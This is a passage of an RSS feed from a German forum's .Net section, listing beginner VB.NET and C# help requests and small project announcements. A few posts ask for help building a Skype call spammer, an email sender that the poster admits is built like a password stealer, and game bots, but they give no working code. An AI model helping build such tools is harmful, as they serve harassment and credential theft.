</code></code><hr />
</div>probiert, er gibt mir aber nichts aus, die Textbox bleibt leer.<br />
<br />
Ich hoffe ihr könnt mir helfen, bin echt am verzweifeln!</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Gangstersheep</dc:creator>
			<guid isPermaLink="true">net-94/vb-net-2-probleme-14863</guid>
		</item>
		<item>
			<title>Proxy-artiges Tool. C#, VB oder Java?</title>
			<link>net-94/proxy-artiges-tool-c-vb-java-14700?goto=newpost</link>
			<pubDate>Thu, 12 Jul 2012 16:00:44 GMT</pubDate>
			<description>Hallo, 
 
Ich habe vor, für ein auf Flash basierendes Onlinespiel einen Bot zu erstellen. Um mir die Arbeit mit der GUI und den ganzen Paketen zu...</description>
			<content:encoded><![CDATA[<div>Hallo,<br />
<br />
Ich habe vor, für ein auf Flash basierendes Onlinespiel einen Bot zu erstellen. Um mir die Arbeit mit der GUI und den ganzen Paketen zu ersparen habe ich vor, das ganze als eine Art Proxy zu realisieren. Soll heißen, dass ich die Verbindungen durch das Programm/den Bot zu jagen (via Proxifier) und diese Pakete dort entweder unbearbeitet oder bearbeitet weiter zugeben, jenachdem was für ein Paket das ist.<br />
Das Programm soll natürlich alle Pakete, die nicht dafür vorgesehen sind so &quot;durchlassen&quot;, beispielsweise falls Pakete von anderen Flash Player Anwendung (bswp. Youtube) ankommen.<br />
<br />
Nun stelle ich mir die Frage, welche Sprache dafür am Besten geeignet ist und wie genau ich das realisieren könnte.<br />
Annehmbare Sprachen wären für mich C#, VB.NET und <b>wenn</b> es nicht anders geht auch Java.<br />
<br />
Über Antworten, die mir helfen würde ich mehr sehr freuen und bedanke mich jetzt schonmal für eure Hilfe<br />
<br />
MFG</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>bluedraqon</dc:creator>
			<guid isPermaLink="true">net-94/proxy-artiges-tool-c-vb-java-14700</guid>
		</item>
		<item>
			<title>VB.Net DoEvents einfügen</title>
			<link>net-94/doevents-einfuegen-14619?goto=newpost</link>
			<pubDate>Mon, 09 Jul 2012 20:46:54 GMT</pubDate>
			<description>Hallo Leute, 
 
Ich habe gerad ein Problem, 
 
Wollte gerade DoEvents in einem Programm einfügen und leider zeigt er mir diese Fehlermeldung an: 
...</description>
			<content:encoded><![CDATA[<div>Hallo Leute,<br />
<br />
Ich habe gerad ein Problem,<br />
<br />
Wollte gerade DoEvents in einem Programm einfügen und leider zeigt er mir diese Fehlermeldung an:<br />
<br />
Fehler	1	&quot;DoEvents&quot; wurde nicht deklariert. Auf das Objekt kann aufgrund seiner Schutzstufe möglicherweise nicht zugegriffen werden.	38	9	<br />
<br />
<br />
Was kann ich da ändern, was muss ich machen damit DoEvents deklariert wird, so das das Programm, eher gesagt die Laufzeit funktioniert?<br />
<br />
Würde mich über schnelle Antworten freuen.<br />
<br />
Liebe Grüße,<br />
<br />
Bazs</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Bazs</dc:creator>
			<guid isPermaLink="true">net-94/doevents-einfuegen-14619</guid>
		</item>
		<item>
			<title>C# Textformatierungen in RichTextBox</title>
			<link>net-94/textformatierungen-in-richtextbox-14448?goto=newpost</link>
			<pubDate>Wed, 04 Jul 2012 14:25:31 GMT</pubDate>
			<description>Hallo! 
 
Ich programmiere gerade einen Chat in C# und möchte eine RichTextBox als Chatverlauf benutzen.  
Der Text soll natürlich nicht immer gleich...</description>
			<content:encoded><![CDATA[<div>Hallo!<br />
<br />
Ich programmiere gerade einen Chat in C# und möchte eine RichTextBox als Chatverlauf benutzen. <br />
Der Text soll natürlich nicht immer gleich sein sondern formatiert (z.B. den der etwas schreibt fett, verschiedene Farben etc). <br />
Wie geht das?</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Minecraft</dc:creator>
			<guid isPermaLink="true">net-94/textformatierungen-in-richtextbox-14448</guid>
		</item>
		<item>
			<title>C# InvalidOperationException</title>
			<link>net-94/invalidoperationexception-14383?goto=newpost</link>
			<pubDate>Mon, 02 Jul 2012 19:19:24 GMT</pubDate>
			<description>Immer, wenn ich mit meinem Bot eingeloggt bin und dann über das X oben rechts schließe, bekomme ich eine InvalidOperationException. Die Form...</description>
			<content:encoded><![CDATA[<div>Immer, wenn ich mit meinem Bot eingeloggt bin und dann über das X oben rechts schließe, bekomme ich eine InvalidOperationException. Die Form verschwindet, jedoch wird der Nick nicht ausgeloggt und das Debugging nicht beendet.<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Zitat:</div>
	<div class="bbcode_quote printable">
		<hr />
		
			<b>InvalidOperationException wurde nicht behandelt.</b><br />
Invoke oder BeginInvoke kann für ein Steuerelement erst aufgerufen werden, wenn das Fensterhandle erstellt wurde.
			
		<hr />
	</div>
</div>Hier der Codeteil, der mir markiert wird.<br />
<br />
<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
this.rtb_Chatverlauf.Invoke((MethodInvoker)delegate()<br />
            {<br />
                rtb_Chatverlauf.AppendFText(str + &quot;\n&quot;); // Nachricht im Verlauf anzeigen...<br />
                rtb_Chatverlauf.ScrollToCaret(); // ... und zum Ende scrollen<br />
            });<br />

</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script>Ich kann darin keinen Fehler entdecken, ihr etwa?<br />
<br />
<br />
<br />
PS: Wäre sicherlich noch gut, wenn ich erwähnt hätte, dass ich dafür ein eigenes Controll als Chatbox verwende.<br />
<br />
Hier der AppendFText-Teil davon:<br />
<script type="text/javascript" src="clientscript/syntaxhighlighter/shCore.js"></script>
<script type="text/javascript" src="clientscript/syntaxhighlighter/shBrushCSharp.js"></script>
<link type="text/css" rel="stylesheet" href="clientscript/syntaxhighlighter/styles/shCoreDefault.css"/>

<pre class="brush: csharp;">
<br />
public void AppendFText(string text) <br />
        {<br />
<br />
            bool isBold = false;<br />
            bool isItalic = false;<br />
<br />
            bool isEscaped = false;<br />
<br />
            FontStyle currStyle = FontStyle.Regular;<br />
<br />
            string tempText = String.Empty;<br />
<br />
            Color currColor = Color.Empty;<br />
<br />
            for (int i = 0; i &lt; text.Length; i++) {<br />
<br />
                char tempChar = text&#91;i&#93;;<br />
<br />
                if (tempChar == '\\') {<br />
<br />
                    isEscaped = !isEscaped;<br />
<br />
                    if (text.Length &gt; i &amp;&amp; isEscaped &amp;&amp; text&#91;i + 1&#93; == '\\')<br />
                        tempText += '\\';<br />
<br />
                    continue;<br />
<br />
                }<br />
<br />
                if (tempChar == '_' &amp;&amp; !isEscaped) {<br />
<br />
                    if (tempText != String.Empty) {<br />
<br />
                        AppendText(tempText, currColor, currStyle);<br />
<br />
                        tempText = String.Empty;<br />
<br />
                    }<br />
<br />
                    if (isBold)<br />
                        currStyle -= FontStyle.Bold;<br />
                    else<br />
                        currStyle |= FontStyle.Bold;<br />
<br />
                    SetStyle(currStyle);<br />
<br />
                    isBold = !isBold;<br />
<br />
                    continue;<br />
<br />
                }<br />
                else if (tempChar == '&quot;' &amp;&amp; !isEscaped) {<br />
<br />
                    if (tempText != String.Empty) {<br />
<br />
                        AppendText(tempText, currColor, currStyle);<br />
<br />
                        tempText = String.Empty;<br />
<br />
                    }<br />
<br />
                    if (isItalic)<br />
                        currStyle -= FontStyle.Italic;<br />
                    else<br />
                        currStyle |= FontStyle.Italic;<br />
<br />
                    SetStyle(currStyle);<br />
<br />
                    isItalic = !isItalic;<br />
<br />
                    continue;<br />
<br />
                }<br />
                else if (tempChar == '#' &amp;&amp; !isEscaped) {<br />
<br />
                    tempText += &quot;\r\n.... &quot;;<br />
<br />
                    continue;<br />
<br />
                }<br />
                else if (tempChar == '°' &amp;&amp; text&#91;i + 2&#93; == '°') {<br />
<br />
                    if (tempText != String.Empty) {<br />
<br />
                        AppendText(tempText, currColor, currStyle);<br />
<br />
                        tempText = String.Empty;<br />
<br />
                    }<br />
<br />
                    currColor = GetColor(text&#91;i + 1&#93;);<br />
<br />
                    i += 2;<br />
<br />
                    continue;<br />
<br />
                }<br />
<br />
                if ((tempChar == '_' || tempChar == '&quot;' || tempChar == '#') &amp;&amp; isEscaped)<br />
                    isEscaped = false;<br />
<br />
                tempText += tempChar;<br />
<br />
            }<br />
<br />
            if (tempText != String.Empty)<br />
                AppendText(tempText, currColor, currStyle);<br />
<br />
        }
</pre>
<script type="text/javascript">
SyntaxHighlighter.config.stripBrs = true;
SyntaxHighlighter.all();
</script></div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Pwned</dc:creator>
			<guid isPermaLink="true">net-94/invalidoperationexception-14383</guid>
		</item>
		<item>
			<title>VB.Net Nach 4 Zeichen automatisch Bindestrich setzen</title>
			<link>net-94/nach-4-zeichen-automatisch-bindestrich-setzen-14364?goto=newpost</link>
			<pubDate>Mon, 02 Jul 2012 15:58:07 GMT</pubDate>
			<description>Ich habe eine Frage da ich erst vor kurzem mit VB.Net angefangen habe. 
 
 
Ich will das wie bei Office installationen bei der Serial, automatisch...</description>
			<content:encoded><![CDATA[<div>Ich habe eine Frage da ich erst vor kurzem mit VB.Net angefangen habe.<br />
<br />
<br />
Ich will das wie bei Office installationen bei der Serial, automatisch nach 4 Zahlen ein Bindestrich gesetzt wird.<br />
<br />
Ich habs schon mit folgender Lösung probiert aber die funktioniert bei mir nicht :S<br />
<a href="http://www.vb-paradise.de/programmieren/hauptforum/12002-automatisch-bindestrich-setzen/" target="_blank" rel="nofollow">[VB 2008] automatisch bindestrich setzen - Hauptforum - Visual-Basic-Forum VB-Paradise.de</a><br />
<br />
<br />
Grüße Jos</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>milchbubix</dc:creator>
			<guid isPermaLink="true">net-94/nach-4-zeichen-automatisch-bindestrich-setzen-14364</guid>
		</item>
		<item>
			<title><![CDATA[VB.Net [BETA] SKyStream]]></title>
			<link>net-94/beta-skystream-14288?goto=newpost</link>
			<pubDate>Sat, 30 Jun 2012 16:58:22 GMT</pubDate>
			<description>Hi, 
 
hier eine Beta Version von SkyStream. 
 
Screen: 
 
Bild: http://i45.tinypic.com/2uppe1y.png</description>
			<content:encoded><![CDATA[<div>Hi,<br />
<br />
hier eine Beta Version von SkyStream.<br />
<br />
Screen:<br />
<br />
<a style="font-weight:bold;text-decoration:none;" target="blank" href="http://i45.tinypic.com/2uppe1y.png"><img  style="vertical-align:text-bottom;" src="https://u-img.net/img/2542Da.png"> BILD ANZEIGEN </a> <a style="font-size:10px;text-decoration:none;" href="http://u-hacks.net/news-und-ankuendigungen-4/erlaubte-imagehoster-17046/" target="blank"> [Warum wird das Bild nicht angezeigt?]</a><br />
<br />
<br />
<br />
Kommende Sachen:<br />
<br />
-Feedback Funktion<br />
-Chat<br />
<br />
<br />
Vorschläge:<br />
Vorschläge bitte 'alle' nur per PN.<br />
<br />
<br />
<a href="http://www.file-upload.net/download-4492832/SkyStream.rar.html" target="_blank" rel="nofollow">Download</a></div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Shane</dc:creator>
			<guid isPermaLink="true">net-94/beta-skystream-14288</guid>
		</item>
		<item>
			<title><![CDATA[VB.Net [Skype API] Anruf beenden?]]></title>
			<link>net-94/skype-api-anruf-beenden-14241?goto=newpost</link>
			<pubDate>Fri, 29 Jun 2012 13:29:10 GMT</pubDate>
			<description>Hey! 
 
Und zwar habe ich vor, einen Anruf-Spammer zu machen. 
Allerdings kann ich einen Anruf einleiten, aber nicht abbrechen! 
 
Hat jemand von...</description>
			<content:encoded><![CDATA[<div>Hey!<br />
<br />
Und zwar habe ich vor, einen Anruf-Spammer zu machen.<br />
Allerdings kann ich einen Anruf einleiten, aber nicht abbrechen!<br />
<br />
Hat jemand von euch schon mal versucht mit der API (SKYPE4COM.dll) in .NET gearbeitet und das geschafft? Ich verzweifel grad... ^^<br />
<br />
Ich denke mal, Code brauche ich nicht zeigen, oder? :)<br />
<br />
PS: Via Google finde ich nichts! Habe schon gegooglet.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Gangstersheep</dc:creator>
			<guid isPermaLink="true">net-94/skype-api-anruf-beenden-14241</guid>
		</item>
		<item>
			<title>VB.Net Stream auslesen</title>
			<link>net-94/stream-auslesen-14233?goto=newpost</link>
			<pubDate>Fri, 29 Jun 2012 10:40:13 GMT</pubDate>
			<description>Hi, 
 
ich versuche über den Label den Stream auszulesen doch es funktioniert nicht. 
 
Sobald in der Textbox der Stream eingegeben wird und auf Play...</description>
			<content:encoded><![CDATA[<div>Hi,<br />
<br />
ich versuche über den Label den Stream auszulesen doch es funktioniert nicht.<br />
<br />
Sobald in der Textbox der Stream eingegeben wird und auf Play gedrückt wird, will ich das Label2 den Stream anzeigt.<br />
<br />
Mein versuchter Code:<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Code:</div>
	<hr /><code class="bbcode_code">AxWindowsMediaPlayer1.URL = Label2.Text</code><hr />
</div></div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Shane</dc:creator>
			<guid isPermaLink="true">net-94/stream-auslesen-14233</guid>
		</item>
		<item>
			<title>VB.Net Design Warnungen</title>
			<link>net-94/design-warnungen-14207?goto=newpost</link>
			<pubDate>Thu, 28 Jun 2012 16:30:34 GMT</pubDate>
			<description>Ich glaube VB will mich heute echt verarschen. 
 
Bevor ich mein Projekt gespeichert habe lief alles wunderbar, keine Fehler. Jetzt öffne ich meine...</description>
			<content:encoded><![CDATA[<div>Ich glaube VB will mich heute echt verarschen.<br />
<br />
Bevor ich mein Projekt gespeichert habe lief alles wunderbar, keine Fehler. Jetzt öffne ich meine Projektmappe und habe über 1800 Warnungen.<br />
<br />
Habe eins von den Designs von iToxic benutzt von den &quot;PureCodes&quot;, und nach dem Projekt neu laden übelst viele Warnungen.<br />
<br />
<a style="font-weight:bold;text-decoration:none;" target="blank" href="http://i46.tinypic.com/24wx3yc.png"><img  style="vertical-align:text-bottom;" src="https://u-img.net/img/2542Da.png"> BILD ANZEIGEN </a> <a style="font-size:10px;text-decoration:none;" href="http://u-hacks.net/news-und-ankuendigungen-4/erlaubte-imagehoster-17046/" target="blank"> [Warum wird das Bild nicht angezeigt?]</a><br />
<br />
Habe die Klasse auch mal neu bearbeitet und den ganzen Code neu eingefügt aber nützt auch nichts.<br />
<br />
Wieso kommen nach dem neuen Öffnen der Projektmappe plötzlich so viele Warnungen?<br />
Verdammte Scheiße -.-<br />
<br />
Ich habe die 39 Formen alle neu gemacht weil ich ja irgendeinen Fehler mit NET Framework hatte und jetzt wieder ein Fehler -.-<br />
<br />
1. Fehler:<br />
Warnung 1 Die Klasse ThemeContainer151 kann entworfen werden, ist aber nicht die erste Klasse in der Datei. Visual Studio erfordert, dass Designer die erste Klasse in der Datei verwenden. Verschieben Sie den Klassencode, sodass die Klasse an erste Stelle in der Datei rückt, und versuchen Sie, den Designer erneut zu laden. 0 0</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>x BoooM x</dc:creator>
			<guid isPermaLink="true">net-94/design-warnungen-14207</guid>
		</item>
		<item>
			<title>VB.Net Fehlermeldung AssemblyAttributes.vb kann nicht geöffnet werden</title>
			<link>net-94/fehlermeldung-assemblyattributes-vb-kann-nicht-geoeffnet-werden-14192?goto=newpost</link>
			<pubDate>Thu, 28 Jun 2012 11:30:03 GMT</pubDate>
			<description>Hi. 
 
Ich sehe plötzlich wo ich nun endlich nach mehreren Stunden fertig bin mit meinem Programm das ein Fehler da ist, ich habe keine Lust das...</description>
			<content:encoded><![CDATA[<div>Hi.<br />
<br />
Ich sehe plötzlich wo ich nun endlich nach mehreren Stunden fertig bin mit meinem Programm das ein Fehler da ist, ich habe keine Lust das nochmal neu zu machen keine Ahnung wieso der aufeinmal da ist, gestern hatte ich den noch nicht. Ich habe auch nichts gelöscht oder so. ;(<br />
<br />
<br />
Die Moduldatei &quot;C:\Users\Lukas\AppData\Local\Temp\.NETFramework,V  ersion=v4.0,Profile=Client.AssemblyAttributes.vb&quot; kann nicht geöffnet werden: Das System kann die angegebene Datei nicht finden. 	C:\Users\Lukas\AppData\Loca\Temp\.NETFramework,Ver  sion=v4.0,Profile=Client.AssemblyAttributes.vb<br />
<br />
Wie kriege ich den weg? :(</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>x BoooM x</dc:creator>
			<guid isPermaLink="true">net-94/fehlermeldung-assemblyattributes-vb-kann-nicht-geoeffnet-werden-14192</guid>
		</item>
		<item>
			<title>VB.Net Text erhalten (Email)</title>
			<link>net-94/text-erhalten-email-14152?goto=newpost</link>
			<pubDate>Wed, 27 Jun 2012 11:29:08 GMT</pubDate>
			<description>Hi, 
 
bei Google habe ich auch kein ordentlichen Code gefunden der mir wirklich helfen konnte. 
 
Also, ich möchte das wenn man in der TextBox einen...</description>
			<content:encoded><![CDATA[<div>Hi,<br />
<br />
bei Google habe ich auch kein ordentlichen Code gefunden der mir wirklich helfen konnte.<br />
<br />
Also, ich möchte das wenn man in der TextBox einen Text eingibt und auf den Button klickt das ich den Inhalt per Email bekomme.<br />
<br />
(ES IST KEIN PW STEALER, AUCH WENN ER SO AUFGEBAUT IST)</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Shane</dc:creator>
			<guid isPermaLink="true">net-94/text-erhalten-email-14152</guid>
		</item>
		<item>
			<title>VB.Net .mp3 über FTP/WebServer abspielen</title>
			<link>net-94/mp3-ueber-ftp-webserver-abspielen-14142?goto=newpost</link>
			<pubDate>Tue, 26 Jun 2012 21:54:37 GMT</pubDate>
			<description>Hi. 
 
Ich hatte das selbe schonmal gefragt finde aber nicht mehr die Antwort dafür. 
Wie konnte man nochmal eine .mp3-Datei abspielen die auf einem...</description>
			<content:encoded><![CDATA[<div>Hi.<br />
<br />
Ich hatte das selbe schonmal gefragt finde aber nicht mehr die Antwort dafür.<br />
Wie konnte man nochmal eine .mp3-Datei abspielen die auf einem FTP/WebServer liegt?<br />
<br />
Media Player habe ich bereits in meiner Form, war das nicht irgendwie so?:<br />
<br />
AxWindowsMediaPlayer1.URL(&quot;http://***.pf-control.de/name.mp3&quot;)<br />
<br />
??</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>x BoooM x</dc:creator>
			<guid isPermaLink="true">net-94/mp3-ueber-ftp-webserver-abspielen-14142</guid>
		</item>
		<item>
			<title>VB.Net (Sehr Simple) BlackRadio</title>
			<link>net-94/sehr-simple-blackradio-14138?goto=newpost</link>
			<pubDate>Tue, 26 Jun 2012 21:14:33 GMT</pubDate>
			<description>Hi, 
 
darf ich vorstellen hihio hier mein kleines Radio. 
Hatte gerade nichts zutun und da ich gerne und oft BackBeats höre, habe ich ein 
kleines...</description>
			<content:encoded><![CDATA[<div>Hi,<br />
<br />
darf ich vorstellen hihio hier mein kleines Radio.<br />
Hatte gerade nichts zutun und da ich gerne und oft BackBeats höre, habe ich ein<br />
kleines Radio programmiert.<br />
<br />
Design: Gefällt mir selber nicht wirklich aber nunja.<br />
<br />
Screen habe ich jetzt ehrlich gesagt keine Lust zu machen, kann ja einer von euch tun :).<br />
<br />
Wer Vorschläge zum Design hat, dann bitte nur als Skizze (Paint, GiMP, PS).<br />
<br />
<br />
</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Shane</dc:creator>
			<guid isPermaLink="true">net-94/sehr-simple-blackradio-14138</guid>
		</item>
		<item>
			<title>VB.Net Bilder in Form einfügen wie am besten?</title>
			<link>net-94/bilder-in-form-einfuegen-wie-am-besten-14121?goto=newpost</link>
			<pubDate>Tue, 26 Jun 2012 18:35:37 GMT</pubDate>
			<description>Hey. 
 
Wie wäre es am besten Bilder in einer Form in VB anzeigen zu lassen wenn es sich um circa 100 Bilder handelt damit das Programm nicht so...</description>
			<content:encoded><![CDATA[<div>Hey.<br />
<br />
Wie wäre es am besten Bilder in einer Form in VB anzeigen zu lassen wenn es sich um circa 100 Bilder handelt damit das Programm nicht so extrem groß wird?<br />
<br />
Bilder abspeichern und alle in einer PictureBox einzeln anzeigen lassen?<br />
<br />
Die Bilder sind auch alle auf einer Website zu finden, kann ich die irgendwie in meine Form mit dem Link vom Bild einbinden?<br />
<br />
Was wäre am besten?</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>x BoooM x</dc:creator>
			<guid isPermaLink="true">net-94/bilder-in-form-einfuegen-wie-am-besten-14121</guid>
		</item>
		<item>
			<title>VB.Net Suche jemand der mir ein Programm macht</title>
			<link>net-94/suche-jemand-der-mir-ein-programm-macht-13974?goto=newpost</link>
			<pubDate>Sat, 23 Jun 2012 11:51:13 GMT</pubDate>
			<description><![CDATA[Hi. 
 
Ich bräuchte ein Programm und kommt mir bitte nicht mit "GhostMouse" das kann erstens nicht eine Seite reloaden und kb 50x einzelne Klicks zu...]]></description>
			<content:encoded><![CDATA[<div>Hi.<br />
<br />
Ich bräuchte ein Programm und kommt mir bitte nicht mit &quot;GhostMouse&quot; das kann erstens nicht eine Seite reloaden und kb 50x einzelne Klicks zu machen und die dann immer abzuspielen.<br />
<br />
<br />
Mit dem Programm möchte ich eine Stelle auf meinem Bildschirm festlegen, die selbe Stelle soll dann 50x angeklickt werden und nach den 50 Klicks soll dann <a href="https://apps.facebook.com/magicland/" target="_blank" rel="nofollow">https://apps.facebook.com/magicland/</a> neu geleaden werden. Danach sollen wieder 50 Klicks auf die selbe Stelle gemacht werden und <a href="https://apps.facebook.com/magicland/" target="_blank" rel="nofollow">https://apps.facebook.com/magicland/</a> soll nach den 50 Klicks wieder reloaded werden usw.<br />
<br />
Es sollte jede Sekunde 1 Klick gemacht werden und das 50x. <br />
<br />
Habe das Video gefunden:<br />
<a href="http://www.youtube.com/watch?v=klZPvkO173A" target="_blank" rel="nofollow">http://www.youtube.com/watch?v=klZPvkO173A</a><br />
<br />
Da könnte ich ja einmal 50 Klicks aufnehmen und immer abspielen aber wie mache ich es das es so lange abgespielt wird bis ich Stop drücke &amp; die Seite soll halt nach den Klicks neu geladen werden &lt;.&lt;<br />
<br />
Und natürlich sollte das ganze mit irgendeiner Taste zu stoppen sein.<br />
<br />
SourceCode wäre auch nice.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>x BoooM x</dc:creator>
			<guid isPermaLink="true">net-94/suche-jemand-der-mir-ein-programm-macht-13974</guid>
		</item>
		<item>
			<title>C# Richtextbox Alternative</title>
			<link>net-94/richtextbox-alternative-13927?goto=newpost</link>
			<pubDate>Thu, 21 Jun 2012 21:38:05 GMT</pubDate>
			<description><![CDATA[Tag, 
 
Ich arbeite grade an meinem "Bot" nun brauch ich nen ordentlichen Chatverlauf, Richtextbox gibt immer Errors aus :/ 
 
bei der KNLib von The...]]></description>
			<content:encoded><![CDATA[<div>Tag,<br />
<br />
Ich arbeite grade an meinem &quot;Bot&quot; nun brauch ich nen ordentlichen Chatverlauf, Richtextbox gibt immer Errors aus :/<br />
<br />
bei der KNLib von The Don of NYC und Flav hat diese Chatbox auch nen Fehler &lt;.&lt;<br />
<br />
Kann mir jemand vllt was gutes empfehlen?</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>GXC1</dc:creator>
			<guid isPermaLink="true">net-94/richtextbox-alternative-13927</guid>
		</item>
		<item>
			<title>VB.Net uDj Stream</title>
			<link>net-94/udj-stream-13894?goto=newpost</link>
			<pubDate>Thu, 21 Jun 2012 13:14:38 GMT</pubDate>
			<description>Hi, 
 
ich habe ja meinen uDj präsentiert allerdings möchte ich das man damit auch wunderbar streamen kann.  
 
Problem: Ich weiß nicht wie ich das...</description>
			<content:encoded><![CDATA[<div>Hi,<br />
<br />
ich habe ja meinen uDj präsentiert allerdings möchte ich das man damit auch wunderbar streamen kann. <br />
<br />
Problem: Ich weiß nicht wie ich das machen soll ich weiß nicht einmal wie sowas aufgebaut ist das es zum Server sendet oder was es überhaupt machen muss damit man damit streamen kann :).<br />
<br />
Ich suche daher jemand der mir das macht, die Projektmappe gibt es dann per PN.</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Shane</dc:creator>
			<guid isPermaLink="true">net-94/udj-stream-13894</guid>
		</item>
		<item>
			<title>VB.Net Der Objektverweis wurde nicht auf eine Objektinstanz festgelegt</title>
			<link>net-94/der-objektverweis-wurde-nicht-eine-objektinstanz-festgelegt-13786?goto=newpost</link>
			<pubDate>Tue, 19 Jun 2012 11:30:49 GMT</pubDate>
			<description>Hey, 
 
Ich hab seit gestern das Problem (es war vorher nicht da, der Code hat sich nicht geändert), dass mir beim compilen ein Error ausgegeben...</description>
			<content:encoded><![CDATA[<div>Hey,<br />
<br />
Ich hab seit gestern das Problem (es war vorher nicht da, der Code hat sich nicht geändert), dass mir beim compilen ein Error ausgegeben wird:<br />
<div class="bbcode_container">
	<div class="bbcode_description">PHP-Code:</div>
	<hr /><code class="bbcode_code"><code><span style="color: #000000">
<span style="color: #0000BB">Fehler&nbsp;beim&nbsp;Erstellen&nbsp;des&nbsp;Formulars</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">Weitere&nbsp;Informationen&nbsp;finden&nbsp;Sie&nbsp;in&nbsp;Exception</span><span style="color: #007700">.</span><span style="color: #0000BB">InnerException</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">Fehler</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">Der&nbsp;Objektverweis&nbsp;wurde&nbsp;nicht&nbsp;auf&nbsp;eine&nbsp;Objektinstanz&nbsp;festgelegt</span><span style="color: #007700">..&nbsp;<br /></span><span style="color: #0000BB"></span>
</span>
</code></code><hr />
</div>Ich übergebe ein paar Werte an die 2. Form<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">PHP-Code:</div>
	<hr /><code class="bbcode_code"><code><span style="color: #000000">
<span style="color: #0000BB">&nbsp;Form2</span><span style="color: #007700">.</span><span style="color: #0000BB">TextBox2</span><span style="color: #007700">.</span><span style="color: #0000BB">Text&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">TextBox1</span><span style="color: #007700">.</span><span style="color: #0000BB">Text<br />Form2</span><span style="color: #007700">.</span><span style="color: #0000BB">RichTextBox2</span><span style="color: #007700">.</span><span style="color: #0000BB">Text&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">TextBox2</span><span style="color: #007700">.</span><span style="color: #0000BB">Text<br />Me</span><span style="color: #007700">.</span><span style="color: #0000BB">Hide</span><span style="color: #007700">()<br /></span><span style="color: #0000BB">Dim&nbsp;frm2&nbsp;</span><span style="color: #007700">As&nbsp;</span><span style="color: #0000BB">Form2&nbsp;</span><span style="color: #007700">=&nbsp;New&nbsp;</span><span style="color: #0000BB">Form2<br />frm2</span><span style="color: #007700">.</span><span style="color: #0000BB">Show</span><span style="color: #007700">()&nbsp;<br /></span><span style="color: #0000BB"></span>
</span>
</code></code><hr />
</div>Hoffe mir kann jemand helfen :)</div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>rVs14</dc:creator>
			<guid isPermaLink="true">net-94/der-objektverweis-wurde-nicht-eine-objektinstanz-festgelegt-13786</guid>
		</item>
		<item>
			<title>VB.Net Runde Form</title>
			<link>net-94/runde-form-13732?goto=newpost</link>
			<pubDate>Sun, 17 Jun 2012 20:53:47 GMT</pubDate>
			<description>Hallo hier ist die Projectmappe zu einer Runden Form in Vb 
Der Name ist n bissl Fail geworden weil das Project eigentlich erst n Stayonline werden...</description>
			<content:encoded><![CDATA[<div>Hallo hier ist die Projectmappe zu einer Runden Form in Vb<br />
Der Name ist n bissl Fail geworden weil das Project eigentlich erst n Stayonline werden sollte.<br />
<br />
DL:<br />
<a href="http://filebeam.com/5ffe6200228724205af2e68135730aff" target="_blank" rel="nofollow">Hier klicken um die Projectmappe herunter zu laden!</a><br />
<br />
Screen:<br />
<div style="margin:20px; margin-top:5px">
<div class="smallfont" style="margin-bottom:2px"><b>Spoiler</b>:<input type="button" value="Show" style="width:45px;font-size:10px;margin:0px;padding:0px;" onClick="if (this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display != '') { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = '';        this.innerText = ''; this.value = 'Hide'; } else { this.parentNode.parentNode.getElementsByTagName('div')[1].getElementsByTagName('div')[0].style.display = 'none'; this.innerText = ''; this.value = 'Show'; }">
</div>
<div class="alt2" style="margin: 0px; padding: 6px; border: 1px inset;">
<div style="display: none;">
<a style="font-weight:bold;text-decoration:none;" target="blank" href="http://img5.fotos-hochladen.net/uploads/unbenanntxioa85mrfu.png"><img  style="vertical-align:text-bottom;" src="https://u-img.net/img/2542Da.png"> BILD ANZEIGEN </a> <a style="font-size:10px;text-decoration:none;" href="http://u-hacks.net/news-und-ankuendigungen-4/erlaubte-imagehoster-17046/" target="blank"> [Warum wird das Bild nicht angezeigt?]</a>
</div>
</div>
</div></div>

]]></content:encoded>
			<category domain="net-94">.Net</category>
			<dc:creator>Sploxfreak</dc:creator>
			<guid isPermaLink="true">net-94/runde-form-13732</guid>
		</item>
		<item>
			<title>VB.Net Textbox Image</title>
			<link>net-94/textbox-image-13724?goto=newpost</link>
			<pubDate>Sun, 17 Jun 2012 19:00:34 GMT</pubDate>
			<description>Hey, 
 
Wie kann man in VB ein Bild als Hintergrund einer Textbox machen? 
Oder kann man sie vielleicht Transparent machen? 
 
Mfg.</description>
